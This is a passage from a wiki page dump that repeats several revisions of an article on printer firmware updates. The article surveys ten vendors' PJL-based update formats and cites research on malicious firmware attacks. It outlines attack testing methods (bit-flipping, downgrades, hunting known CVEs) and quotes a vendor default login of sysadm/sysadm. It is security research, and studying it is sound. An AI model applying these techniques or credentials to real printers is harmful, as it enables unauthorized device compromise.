obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information. === Brother === Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code>, while 9 <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms. === Lexmark === Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>. === Samsung === Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms. === Xerox === Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself. === Ricoh === The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>. === Kyocera === Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms. === Konica === Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure. == Results == Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however, is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below: {| class="wikitable" |- ! Vendor !! Extension !! Quantity !! File header or type |- | rowspan="2" | HP | rfu || 419 || @PJL UPGRADE SIZE=… |- | bdl || 206 || FutureSmart binary format |- | rowspan="3" | Epson | rcx || 49 || SEIKO EPSON EpsonNet Form |- | prn || 9 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | brn || 7 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | rowspan="6" | Dell | fls, fly || 30 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | prn || 25 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 18 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 3 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | ps || 2 || PostScript (title: ''Firmware Update'') |- | pjl || 1 || @PJL ENTER LANGUAGE=FLASH |- | rowspan="2" | Brother | djf || 79 || @PJL EXECUTE BRDOWNLOAD |- | blf || 9 || @PJL ENTER LANGUAGE=PCL |- | rowspan="2" | Lexmark | fls || 63 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | bin, fls || 6 || Unknown binary format |- | rowspan="2" | Samsung | hd || 33 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | fls, hd0 || 4 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | rowspan="10" | Xerox | ps || 36 || PostScript (title: ''Firmware Update'') |- | dlm || 35 || Xerox Dynamic Loadable Module |- | prn, bin || 20 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 16 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 10 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | bin || 10 || @PJL SET JOBATTR="@SWDL" |- | fls, hd, hde || 8 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH |- | pjl || 3 || @PJL FSDOWNLOAD [name].rpm |- | axf || 3 || RISC OS AIF executable |- | rowspan="3" | Ricoh | brn || 15 || @PJL FWDOWNLOAD… |- | bin || 14 || @PJL RSYSTEMUPDATE SIZE=… |- | fls || 4 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | rowspan="4" | Kyocera | cramfs, img || 98 || cramfs image |- | bin, squashfs || 79 || squashfs image |- | bin, kmmfp || 41 || u-boot legacy uImage |- | efi, kmpanel || 13 || proprietary image format |- | rowspan="4" | Konica Minolta | bin || 38 || unknown binary, additional checksum file |- | ps || 20 || PostScript (title: ''Softload printer modules'') |- | ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE |- | upg || 1 || @PJL ENTER LANGUAGE=UPGRADE |- |} '''How to test for this attack?''' The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project. ''Other attack scenarios include:'' * Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses. * Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable). * Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547]. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 18bb79f15f180ec0cb8fe757763ca22bcc654758 319 318 2017-01-31T08:56:33Z 84.153.135.37 0 /* Canon */ wikitext text/x-wiki The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device. Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>. == Vendors == To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows. === HP === Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>. === Canon === Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’. === Epson === Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms. === Dell === Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information. === Brother === Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters, one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code> while nine <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms. === Lexmark === Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>. === Samsung === Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms. === Xerox === Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself. === Ricoh === The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>. === Kyocera === Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms. === Konica === Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure. == Results == Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however, is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below: {| class="wikitable" |- ! Vendor !! Extension !! Quantity !! File header or type |- | rowspan="2" | HP | rfu || 419 || @PJL UPGRADE SIZE=… |- | bdl || 206 || FutureSmart binary format |- | rowspan="3" | Epson | rcx || 49 || SEIKO EPSON EpsonNet Form |- | prn || 9 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | brn || 7 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | rowspan="6" | Dell | fls, fly || 30 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | prn || 25 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 18 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 3 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | ps || 2 || PostScript (title: ''Firmware Update'') |- | pjl || 1 || @PJL ENTER LANGUAGE=FLASH |- | rowspan="2" | Brother | djf || 79 || @PJL EXECUTE BRDOWNLOAD |- | blf || 9 || @PJL ENTER LANGUAGE=PCL |- | rowspan="2" | Lexmark | fls || 63 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | bin, fls || 6 || Unknown binary format |- | rowspan="2" | Samsung | hd || 33 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | fls, hd0 || 4 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | rowspan="10" | Xerox | ps || 36 || PostScript (title: ''Firmware Update'') |- | dlm || 35 || Xerox Dynamic Loadable Module |- | prn, bin || 20 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 16 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 10 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | bin || 10 || @PJL SET JOBATTR="@SWDL" |- | fls, hd, hde || 8 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH |- | pjl || 3 || @PJL FSDOWNLOAD [name].rpm |- | axf || 3 || RISC OS AIF executable |- | rowspan="3" | Ricoh | brn || 15 || @PJL FWDOWNLOAD… |- | bin || 14 || @PJL RSYSTEMUPDATE SIZE=… |- | fls || 4 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | rowspan="4" | Kyocera | cramfs, img || 98 || cramfs image |- | bin, squashfs || 79 || squashfs image |- | bin, kmmfp || 41 || u-boot legacy uImage |- | efi, kmpanel || 13 || proprietary image format |- | rowspan="4" | Konica Minolta | bin || 38 || unknown binary, additional checksum file |- | ps || 20 || PostScript (title: ''Softload printer modules'') |- | ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE |- | upg || 1 || @PJL ENTER LANGUAGE=UPGRADE |- |} '''How to test for this attack?''' The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project. ''Other attack scenarios include:'' * Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses. * Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable). * Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547]. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 92e41f4fefb72c8bf2c4bc3eee8964b4a7af4b2a 318 267 2017-01-31T08:53:10Z 84.153.135.37 0 /* Ricoh */ wikitext text/x-wiki The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device. Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>. == Vendors == To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows. === HP === Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>. === Canon === Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number which to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’. === Epson === Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms. === Dell === Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information. === Brother === Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters, one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code> while nine <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms. === Lexmark === Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>. === Samsung === Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms. === Xerox === Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself. === Ricoh === The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and 